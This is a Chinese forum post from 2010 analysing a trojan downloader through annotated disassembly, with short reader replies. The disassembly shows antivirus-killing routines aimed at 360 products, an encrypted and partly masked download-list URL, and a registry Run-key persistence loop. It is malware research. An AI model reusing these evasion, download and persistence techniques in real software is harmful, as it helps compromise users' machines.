100014C3 |.  C645 C8 65    mov byte ptr , 65
100014C7 |.  C645 C9 76    mov byte ptr , 76
100014CB |.  C645 CA 2E    mov byte ptr , 2E
100014CF |.  C645 CB 64    mov byte ptr , 64
100014D3 |.  C645 CC 6C    mov byte ptr , 6C
100014D7 |.  C645 CD 6C    mov byte ptr , 6C
100014DB |.  C645 CE 00    mov byte ptr , 0//newdev.dll
100014DF |.  8D4D C4       lea ecx,
100014E2 |.  51             push ecx                            ; /pModule
100014E3 |.  FF15 4C800010 call dword ptr [<&KERNEL32.GetModule>; \GetModuleHandleA
100014E9 |.  8945 D0       mov , eax
100014EC |.  837D D0 00    cmp , 0
100014F0 |.  75 0D          jnz short 100014FF
100014F2 |.  8D55 C4       lea edx,
100014F5 |.  52             push edx                            ; /FileName
100014F6 |.  FF15 3C800010 call dword ptr [<&KERNEL32.LoadLibra>; \LoadLibraryA
100014FC |.  8945 D0       mov , eax
100014FF |>  C645 D4 55    mov byte ptr , 55
...
10001583 |.  C645 F5 41    mov byte ptr , 41
10001587 |.  C645 F6 00    mov byte ptr , 0 //输入字符UpdateDriverForPlugAndPlayDevicesA
1000158B |.  8D45 D4       lea eax,
1000158E |.  50             push eax                            ; /ProcNameOrOrdinal
1000158F |.  8B4D D0       mov ecx,                ; |
10001592 |.  51             push ecx                            ; |hModule
10001593 |.  FF15 34800010 call dword ptr [<&KERNEL32.GetProcAd>; \GetProcAddress
10001599 |.  8945 B0       mov , eax
1000159C |.  8D55 FC       lea edx,
1000159F |.  52             push edx
100015A0 |.  6A 01          push 1
100015A2 |.  8B45 08       mov eax,
100015A5 |.  50             push eax
100015A6 |.  8B4D 0C       mov ecx,
100015A9 |.  51             push ecx
100015AA |.  6A 00          push 0
100015AC |.  FF55 B0       call //动态调用newdev.UpdateDriverForPlugAndPlayDevicesA
100015AF |.  85C0          test eax, eax
100015B1 |.  75 04          jnz short 100015B7
100015B3 |.  32C0          xor al, al
100015B5 |.  EB 0C          jmp short 100015C3
100015B7 |>  8B55 F8       mov edx,
100015BA |.  52             push edx
100015BB |.  FF15 64810010 call dword ptr [<&SETUPAPI.SetupDiDe>;  setupapi.SetupDiDestroyDeviceInfoList
100015C1 |.  B0 01          mov al, 1
100015C3 |>  8BE5          mov esp, ebp
100015C5 |.  5D             pop ebp
100015C6 \.  C3             retn关键call 5 ,关闭杀软10001880          /$  55                push ebp
10001881          |.  8BEC                mov ebp, esp
10001883          |.  81EC DC020000       sub esp, 2DC
10001889          |.  C785 F8FDFFFF 74FA4C>mov , 164CFA74
...
10001DD8          |.  C685 8CFDFFFF 33    mov byte ptr , 33
10001DDF          |.  C685 8DFDFFFF 36    mov byte ptr , 36
10001DE6          |.  C685 8EFDFFFF 30    mov byte ptr , 30
10001DED          |.  C685 8FFDFFFF 72    mov byte ptr , 72
10001DF4          |.  C685 90FDFFFF 70    mov byte ptr , 70
10001DFB          |.  C685 91FDFFFF 00    mov byte ptr , 0       ;  360rp
10001E02          |.  8D85 8CFDFFFF       lea eax,
10001E08          |.  50                push eax
10001E09          |.  E8 32F8FFFF       call <KILLAV> //关闭杀软函数
10001E0E          |.  83C4 04             add esp, 4
10001E11          |.  C685 94FDFFFF 73    mov byte ptr , 73
10001E18          |.  C685 95FDFFFF 61    mov byte ptr , 61
10001E1F          |.  C685 96FDFFFF 66    mov byte ptr , 66
10001E26          |.  C685 97FDFFFF 65    mov byte ptr , 65
10001E2D          |.  C685 98FDFFFF 6D    mov byte ptr , 6D
10001E34          |.  C685 99FDFFFF 6F    mov byte ptr , 6F
10001E3B          |.  C685 9AFDFFFF 6E    mov byte ptr , 6E
10001E42          |.  C685 9BFDFFFF 2E    mov byte ptr , 2E
10001E49          |.  C685 9CFDFFFF 64    mov byte ptr , 64
10001E50          |.  C685 9DFDFFFF 6C    mov byte ptr , 6C
10001E57          |.  C685 9EFDFFFF 6C    mov byte ptr , 6C
10001E5E          |.  C685 9FFDFFFF 00    mov byte ptr , 0       ;  Safemon.dll
10001E65          |.  8D8D 94FDFFFF       lea ecx,
10001E6B          |.  51                push ecx
10001E6C          |.  E8 CF0D0000       call <卸载> //卸载Safemon.dll函数
10001E71          |.  83C4 04             add esp, 4
10001E74          |>  837D D8 00          cmp , 0
10001E78          |.  0F84 BF000000       je 10001F3D
10001E7E          |.  68 2D3FC919       push 19C93F2D
10001E83          |.  E8 880C0000       call 10002B10
10001E88          |.  83C4 04             add esp, 4
10001E8B          |.  85C0                test eax, eax
10001E8D          |.  0F85 AA000000       jnz 10001F3D...

B.dll分析：大小为“9,728 ”字节,主要来分析其导出Execute函数
Execute函数分析：10002520 g>/$  55             push ebp                         ;  (Initial CPU selection)
10002521 |.  8BEC          mov ebp,esp
10002523 |.  83EC 28       sub esp,28
10002526 |.  C645 EC 53    mov byte ptr ss:,53
1000252A |.  C645 ED 65    mov byte ptr ss:,65
1000252E |.  C645 EE 42    mov byte ptr ss:,42
10002532 |.  C645 EF 65    mov byte ptr ss:,65
10002536 |.  C645 F0 62    mov byte ptr ss:,62
1000253A |.  C645 F1 75    mov byte ptr ss:,75
1000253E |.  C645 F2 67    mov byte ptr ss:,67
10002542 |.  C645 F3 50    mov byte ptr ss:,50
10002546 |.  C645 F4 72    mov byte ptr ss:,72
1000254A |.  C645 F5 69    mov byte ptr ss:,69
1000254E |.  C645 F6 76    mov byte ptr ss:,76
10002552 |.  C645 F7 69    mov byte ptr ss:,69
10002556 |.  C645 F8 6C    mov byte ptr ss:,6C
1000255A |.  C645 F9 65    mov byte ptr ss:,65
1000255E |.  C645 FA 67    mov byte ptr ss:,67
10002562 |.  C645 FB 65    mov byte ptr ss:,65
10002566 |.  C645 FC 00    mov byte ptr ss:,0
1000256A |.  68 D8FB457A    push 7A45FBD8
1000256F |.  E8 ACECFFFF    call <gterg.取API函数>
10002574 |.  83C4 04       add esp,4
10002577 |.  8945 E0       mov ,eax                ;  把获取的API地址存入局部变量中
1000257A |.  68 A4746248    push 486274A4
1000257F |.  E8 9CECFFFF    call <gterg.取API函数>
10002584 |.  83C4 04       add esp,4
10002587 |.  8945 E8       mov ,eax                ;  把获取的API地址存入局部变量中
1000258A |.  68 1F332F67    push 672F331F
1000258F |.  E8 8CECFFFF    call <gterg.取API函数>
10002594 |.  83C4 04       add esp,4
10002597 |.  8945 D8       mov ,eax
1000259A |.  8D45 EC       lea eax,
1000259D |.  50             push eax
1000259E |.  6A 00          push 0
100025A0 |.  68 01001F00    push 1F0001
100025A5 |.  FF55 E0       call                   ;  动态调用kernel32.OpenMutexA函数
100025A8 |.  8945 E4       mov ,eax
100025AB |.  837D E4 00    cmp ,0
100025AF |.  75 10          jnz short gterg.100025C1
100025B1 |.  8D4D EC       lea ecx,
100025B4 |.  51             push ecx
100025B5 |.  6A 00          push 0
100025B7 |.  6A 00          push 0
100025B9 |.  FF55 E8       call                   ; kernel32.CreateMutexA
100025BC |.  8945 E4       mov ,eax
100025BF |.  EB 05          jmp short gterg.100025C6
100025C1 |>  6A 00          push 0
100025C3 |.  FF55 D8       call
100025C6 |>  6A 00          push 0                            ; /pThreadId = NULL
100025C8 |.  6A 00          push 0                            ; |CreationFlags = 0
100025CA |.  6A 00          push 0                            ; |pThreadParm = NULL
100025CC |.  68 40230010    push gterg.10002340                ; |ThreadFunction = gterg.10002340//线程函数3
100025D1 |.  6A 00          push 0                            ; |StackSize = 0
100025D3 |.  6A 00          push 0                            ; |pSecurity = NULL
100025D5 |.  FF15 34300010 call dword ptr ds:[<&KERNEL32.Creat>; \CreateThread
100025DB |.  8945 DC       mov ,eax
100025DE |.  8B55 DC       mov edx,
100025E1 |.  52             push edx                         ; /hObject
100025E2 |.  FF15 10300010 call dword ptr ds:[<&KERNEL32.Close>; \CloseHandle
100025E8 |.  6A 00          push 0                            ; /pThreadId = NULL
100025EA |.  6A 00          push 0                            ; |CreationFlags = 0
100025EC |.  6A 00          push 0                            ; |pThreadParm = NULL
100025EE |.  68 F0240010    push gterg.100024F0                ; |ThreadFunction = gterg.100024F0//线程函数4
100025F3 |.  6A 00          push 0                            ; |StackSize = 0
100025F5 |.  6A 00          push 0                            ; |pSecurity = NULL
100025F7 |.  FF15 34300010 call dword ptr ds:[<&KERNEL32.Creat>; \CreateThread
100025FD |.  8945 DC       mov ,eax
10002600 |.  6A FF          push -1                            ; /Timeout = INFINITE
10002602 |.  8B45 DC       mov eax,                ; |
10002605 |.  50             push eax                         ; |hObject
10002606 |.  FF15 18300010 call dword ptr ds:[<&KERNEL32.WaitF>; \WaitForSingleObject
1000260C |.  33C0          xor eax,eax
1000260E |.  8BE5          mov esp,ebp
10002610 |.  5D             pop ebp
10002611 \.  C3             retn//线程函数3，下载病毒文件10002340 /.  55             push ebp
10002341 |.  8BEC          mov ebp,esp
10002343 |.  81EC 38030000 sub esp,338
10002349 |.  68 81694C21    push 214C6981
1000234E |.  E8 CDEEFFFF    call <gterg.取API函数>
10002353 |.  83C4 04       add esp,4
10002356 |.  8985 E4FDFFFF mov ,eax
1000235C |.  68 04010000    push 104
10002361 |.  8D85 F8FEFFFF lea eax,
10002367 |.  50             push eax
10002368 |.  FF95 E4FDFFFF call                               ;  kernel32.GetSystemDirectoryA
1000236E |.  C685 D4FDFFFF 5>mov byte ptr ss:,5C
10002375 |.  C685 D5FDFFFF 5>mov byte ptr ss:,5C
1000237C |.  C685 D6FDFFFF 7>mov byte ptr ss:,77
10002383 |.  C685 D7FDFFFF 6>mov byte ptr ss:,69
1000238A |.  C685 D8FDFFFF 6>mov byte ptr ss:,6E
10002391 |.  C685 D9FDFFFF 6>mov byte ptr ss:,69
10002398 |.  C685 DAFDFFFF 6>mov byte ptr ss:,6E
1000239F |.  C685 DBFDFFFF 6>mov byte ptr ss:,65
100023A6 |.  C685 DCFDFFFF 7>mov byte ptr ss:,74
100023AD |.  C685 DDFDFFFF 2>mov byte ptr ss:,2E
100023B4 |.  C685 DEFDFFFF 6>mov byte ptr ss:,64
100023BB |.  C685 DFFDFFFF 6>mov byte ptr ss:,6C
100023C2 |.  C685 E0FDFFFF 6>mov byte ptr ss:,6C
100023C9 |.  C685 E1FDFFFF 0>mov byte ptr ss:,0                   ;  输入字符\\wininet.dll
100023D0 |.  8D8D D4FDFFFF lea ecx,
100023D6 |.  51             push ecx                                     ; /StringToAdd
100023D7 |.  8D95 F8FEFFFF lea edx,                            ; |
100023DD |.  52             push edx                                     ; |ConcatString
100023DE |.  FF15 0C300010 call dword ptr ds:[<&KERNEL32.lstrcatA>]       ; \lstrcatA
100023E4 |.  68 18813B72    push 723B8118
100023E9 |.  E8 32EEFFFF    call <gterg.取API函数>
100023EE |.  83C4 04       add esp,4
100023F1 |.  8985 F0FEFFFF mov ,eax
100023F7 |.  8D85 E8FDFFFF lea eax,
100023FD |.  50             push eax
100023FE |.  68 04010000    push 104
10002403 |.  FF95 F0FEFFFF call                               ;  kernel32.GetTempPathA
10002409 |.  8D8D C8FCFFFF lea ecx,
1000240F |.  51             push ecx                                     ; /TempName
10002410 |.  6A 00          push 0                                        ; |Unique = 0
10002412 |.  6A 00          push 0                                        ; |Prefix = NULL
10002414 |.  8D95 E8FDFFFF lea edx,                            ; |
1000241A |.  52             push edx                                     ; |Path
1000241B |.  FF15 28300010 call dword ptr ds:[<&KERNEL32.GetTempFileNameA>>; \GetTempFileNameA
10002421 |.  68 04B5FE3A    push 3AFEB504
10002426 |.  E8 F5EDFFFF    call <gterg.取API函数>
1000242B |.  83C4 04       add esp,4
1000242E |.  8985 F4FEFFFF mov ,eax
10002434 |.  6A 00          push 0
10002436 |.  8D85 C8FCFFFF lea eax,
1000243C |.  50             push eax
1000243D |.  8D8D F8FEFFFF lea ecx,
10002443 |.  51             push ecx
10002444 |.  FF95 F4FEFFFF call                               ;  kernel32.CopyFileA
1000244A |.  8D95 C8FCFFFF lea edx,
10002450 |.  52             push edx                                     ; //FileName = "C:\DOCUME~1\safe\LOCALS~1\Temp\B.tmp"
10002451 |.  FF15 2C300010 call dword ptr ds:[<&KERNEL32.LoadLibraryA>] ; \\LoadLibraryA
10002457 |.  8985 D0FDFFFF mov ,eax
1000245D |.  68 C0058F0B    push 0B8F05C0
10002462 |.  8B85 D0FDFFFF mov eax,
10002468 |.  50             push eax
10002469 |.  E8 92ECFFFF    call <gterg.获取API函数>
1000246E |.  83C4 08       add esp,8
10002471 |.  A3 48400010    mov dword ptr ds:,eax
10002476 |.  68 07166015    push 15601607
1000247B |.  8B8D D0FDFFFF mov ecx,
10002481 |.  51             push ecx
10002482 |.  E8 79ECFFFF    call <gterg.获取API函数>
10002487 |.  83C4 08       add esp,8
1000248A |.  A3 4C400010    mov dword ptr ds:,eax
1000248F |.  68 2DAF9C4E    push 4E9CAF2D
10002494 |.  8B95 D0FDFFFF mov edx,
1000249A |.  52             push edx
1000249B |.  E8 60ECFFFF    call <gterg.获取API函数>
100024A0 |.  83C4 08       add esp,8
100024A3 |.  A3 40400010    mov dword ptr ds:,eax
100024A8 |.  68 01144601    push 1461401
100024AD |.  8B85 D0FDFFFF mov eax,
100024B3 |.  50             push eax
100024B4 |.  E8 47ECFFFF    call <gterg.获取API函数>
100024B9 |.  83C4 08       add esp,8
100024BC |.  A3 44400010    mov dword ptr ds:,eax
100024C1 |>  B9 01000000    /mov ecx,1
100024C6 |.  85C9          |test ecx,ecx
100024C8 |.  74 12          |je short gterg.100024DC
100024CA |.  E8 21FBFFFF    |call gterg.10001FF0 //关键call 6
100024CF |.  68 40E5D900    |push 0D9E540                                  ; /Timeout = 14280000. ms
100024D4 |.  FF15 1C300010 |call dword ptr ds:[<&KERNEL32.Sleep>]       ; \Sleep
100024DA |.^ EB E5          \jmp short gterg.100024C1
100024DC |>  33C0          xor eax,eax
100024DE |.  8BE5          mov esp,ebp
100024E0 |.  5D             pop ebp
100024E1 \.  C2 0400       retn 4进入关键call 6，此函数连接网络下载病毒列表文件，根据列表内容下载病毒。10001FF0 /$  55             push ebp
10001FF1 |.  8BEC          mov ebp,esp
10001FF3 |.  81EC 00030000 sub esp,300
10001FF9 |.  C785 34FEFFFF 0>mov ,0
10002003 |.  EB 0F          jmp short gterg.10002014
10002005 |>  8B85 34FEFFFF /mov eax,
1000200B |.  83C0 01       |add eax,1
1000200E |.  8985 34FEFFFF |mov ,eax
10002014 |>  83BD 34FEFFFF 6> cmp ,64
1000201B |.  7D 02          |jge short gterg.1000201F
1000201D |.^ EB E6          \jmp short gterg.10002005
1000201F |>  6A 4F          push 4F
10002021 |.  6A 40          push 40
10002023 |.  8D8D 40FFFFFF lea ecx,
10002029 |.  51             push ecx
1000202A |.  68 00400010    push gterg.10004000                            ;  ';;?u``;7;a~{yw{|a, "uww`7 $a;7;OOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
1000202F |.  E8 3CF2FFFF    call gterg.10001270                            ;  解密函数，解出下载列表地址"http://txt.146***843.com:8080/xok.txt"
10002034 |.  83C4 10       add esp,10
10002037 |.  C785 30FEFFFF 0>mov ,0
10002041 |.  EB 0F          jmp short gterg.10002052
10002043 |>  8B95 30FEFFFF /mov edx,
10002049 |.  83C2 01       |add edx,1
1000204C |.  8995 30FEFFFF |mov ,edx
10002052 |>  83BD 30FEFFFF 6> cmp ,64
10002059 |.  7D 02          |jge short gterg.1000205D
1000205B |.^ EB E6          \jmp short gterg.10002043
1000205D |>  68 81694C21    push 214C6981
10002062 |.  E8 B9F1FFFF    call <gterg.取API函数>
10002067 |.  83C4 04       add esp,4
1000206A |.  8945 E8       mov ,eax
1000206D |.  68 04010000    push 104
10002072 |.  8D85 38FEFFFF lea eax,
10002078 |.  50             push eax
10002079 |.  FF55 E8       call                               ; kernel32.GetSystemDirectoryA
1000207C |.  C645 F4 75    mov byte ptr ss:,75
10002080 |.  C645 F5 73    mov byte ptr ss:,73
10002084 |.  C645 F6 65    mov byte ptr ss:,65
10002088 |.  C645 F7 72    mov byte ptr ss:,72
1000208C |.  C645 F8 33    mov byte ptr ss:,33
10002090 |.  C645 F9 32    mov byte ptr ss:,32
10002094 |.  C645 FA 2E    mov byte ptr ss:,2E
10002098 |.  C645 FB 64    mov byte ptr ss:,64
1000209C |.  C645 FC 6C    mov byte ptr ss:,6C
100020A0 |.  C645 FD 6C    mov byte ptr ss:,6C
100020A4 |.  C645 FE 00    mov byte ptr ss:,0                      ;  user32.dll
100020A8 |.  8D4D F4       lea ecx,
100020AB |.  51             push ecx                                     ; /pModule
100020AC |.  FF15 30300010 call dword ptr ds:[<&KERNEL32.GetModuleHandleA>>; \GetModuleHandleA
100020B2 |.  8945 CC       mov ,eax
100020B5 |.  68 D3774938    push 384977D3
100020BA |.  8B55 CC       mov edx,
100020BD |.  52             push edx
100020BE |.  E8 3DF0FFFF    call <gterg.获取API函数>
100020C3 |.  83C4 08       add esp,8
100020C6 |.  8945 D4       mov ,eax
100020C9 |.  68 8A7F0000    push 7F8A
100020CE |.  68 007F0000    push 7F00                                     ; /RsrcName = IDC_ARROW
100020D3 |.  6A 00          push 0                                        ; |hInst = NULL
100020D5 |.  FF15 4C300010 call dword ptr ds:[<&USER32.LoadCursorA>]    ; \LoadCursorA
100020DB |.  50             push eax                                     ; /hIcon
100020DC |.  FF15 44300010 call dword ptr ds:[<&USER32.CopyIcon>]       ; \CopyIcon
100020E2 |.  50             push eax
100020E3 |.  FF55 D4       call                               ;  user32.SetSystemCursor
100020E6 |.  C745 D0 0000000>mov ,0
100020ED |.  8D45 D0       lea eax,
100020F0 |.  50             push eax
100020F1 |.  8D8D 40FFFFFF lea ecx,
100020F7 |.  51             push ecx
100020F8 |.  E8 E3FCFFFF    call gterg.10001DE0                            ;  连接网络下载病毒列表文件
...下面的代码就是下载病毒并运行的部分了，篇幅有限这里就不在写了。//线程函数4，作用每隔1000MS，写开机自启动项键值SOFTWARE\Microsoft\Windows\CurrentVersion\Run，C:\WINDOWS\system32\system.exe100024F0 /.  55             push ebp
100024F1 |.  8BEC          mov ebp,esp
100024F3 |>  B8 01000000    /mov eax,1
100024F8 |.  85C0          |test eax,eax
100024FA |.  74 12          |je short gterg.1000250E
100024FC |.  E8 2FEEFFFF    |call gterg.10001330 //关键call 7
10002501 |.  68 E8030000    |push 3E8                         ; /Timeout = 1000. ms
10002506 |.  FF15 1C300010 |call dword ptr ds:[<&KERNEL32.Slee>; \Sleep
1000250C |.^ EB E5          \jmp short gterg.100024F3 //每隔1000MS循环
1000250E |>  33C0          xor eax,eax
10002510 |.  5D             pop ebp
10002511 \.  C2 0400       retn 4关键进入call 7，作用写自启动项10001330 /$  55             push ebp
10001331 |.  8BEC          mov ebp,esp
...
100019E6 |.  C685 F5FEFFFF 0>mov byte ptr ss:,0       ;  SOFTWARE\Microsoft\Windows\CurrentVersion\Run
100019ED |.  8D8D A0FEFFFF lea ecx,                ;  看见这个键值就可以知道下面要写自启动项
100019F3 |.  51             push ecx
100019F4 |.  68 06000200    push 20006
100019F9 |.  6A 00          push 0
100019FB |.  8D95 C8FEFFFF lea edx,
10001A01 |.  52             push edx
10001A02 |.  68 02000080    push 80000002
10001A07 |.  FF95 B8FEFFFF call                   ;  advapi32.RegOpenKeyExA
10001A0D |.  68 04010000    push 104                         ; /BufSize = 104 (260.)
10001A12 |.  8D85 F8FEFFFF lea eax,                ; |
10001A18 |.  50             push eax                         ; |Buffer
10001A19 |.  FF15 08300010 call dword ptr ds:[<&KERNEL32.GetSy>; \GetSystemDirectoryA
10001A1F |.  C685 BCFEFFFF 5>mov byte ptr ss:,5C
10001A26 |.  C685 BDFEFFFF 7>mov byte ptr ss:,73
10001A2D |.  C685 BEFEFFFF 7>mov byte ptr ss:,79
10001A34 |.  C685 BFFEFFFF 7>mov byte ptr ss:,73
10001A3B |.  C685 C0FEFFFF 7>mov byte ptr ss:,74
10001A42 |.  C685 C1FEFFFF 6>mov byte ptr ss:,65
10001A49 |.  C685 C2FEFFFF 6>mov byte ptr ss:,6D
10001A50 |.  C685 C3FEFFFF 2>mov byte ptr ss:,2E
10001A57 |.  C685 C4FEFFFF 6>mov byte ptr ss:,65
10001A5E |.  C685 C5FEFFFF 7>mov byte ptr ss:,78
10001A65 |.  C685 C6FEFFFF 6>mov byte ptr ss:,65
10001A6C |.  C685 C7FEFFFF 0>mov byte ptr ss:,0       ;  \system.exe
...
10001B15 |.  C685 C3FEFFFF 0>mov byte ptr ss:,0
10001B1C |.  8D85 F8FEFFFF lea eax,
10001B22 |.  50             push eax                         ; //String = "C:\WINDOWS\system32\system.exe"
10001B23 |.  FF15 00300010 call dword ptr ds:[<&KERNEL32.lstrl>; \\lstrlenA取字符串长度
10001B29 |.  50             push eax
10001B2A |.  8D8D F8FEFFFF lea ecx,
10001B30 |.  51             push ecx
10001B31 |.  6A 01          push 1
10001B33 |.  6A 00          push 0
10001B35 |.  8D95 BDFEFFFF lea edx,dword ptr ss:
10001B3B |.  52             push edx
10001B3C |.  8B85 A0FEFFFF mov eax,
10001B42 |.  50             push eax
10001B43 |.  FF95 B4FEFFFF call                   ;  advapi32.RegSetValueExA//写开机自启动项
10001B49 |.  5F             pop edi
10001B4A |.  5E             pop esi
10001B4B |.  8BE5          mov esp,ebp
10001B4D |.  5D             pop ebp
10001B4E \.  C3             retn顺便提一下获取kernel32.dll模块地址的一种方法：100011DD |.  64:8B1D 3000000>mov ebx,dword ptr fs:       ;  //这边4行代码是获取kernel32.dll模块地址，这是取kernel32.dll模块地址方法之一
100011E4 |.  8B4B 0C       mov ecx,dword ptr ds:
100011E7 |.  8B49 1C       mov ecx,dword ptr ds:
100011EA |.  8B09          mov ecx,dword ptr ds:
100011EC |.  8B41 08       mov eax,dword ptr ds:    ;  //把kernel32.dll模块地址存入EAX有不对之处还请大家指教。

热火朝天 发表于 2010-7-21 22:08:43

谢谢啦，好详细，先作个记号，有空断网自己玩一下

hdwlx 发表于 2010-7-21 22:17:42

高手分析，谢谢详细介绍

温柔刀客 发表于 2010-7-21 23:28:20

很不错

huzhao23 发表于 2010-7-22 00:39:22

本帖最后由 huzhao23 于 2010-7-22 00:50 编辑

这个怎么跟我前几天看的那个下载者一样呢，太神奇了，我分析的样本名字叫做ssdown.

A.DLL 里面的驱动部分是对抗杀毒软件的关键，B.tmp 文件在rundll32.exe 进程中是否被加载？列表文本文件里的内容是否是加密的还是没有加密的呢？，期待楼主的详细分析啊:handshake

Alar30 发表于 2010-7-22 08:34:39

支持详细分析的
来学习下

chhzh 发表于 2010-7-22 08:47:48

楼主分析的太好了。膜拜！

ayumi_usb 发表于 2010-7-22 09:09:03

下下来看一看

GoForever 发表于 2010-7-27 14:24:49

呵顶一个学习下

垃圾一个 发表于 2010-9-9 09:31:51

360不是拦截驱动，这由啥用。

页: [1]

一蓑烟雨论坛's Archiver

木马下载者Rootkit.xkill.exe分析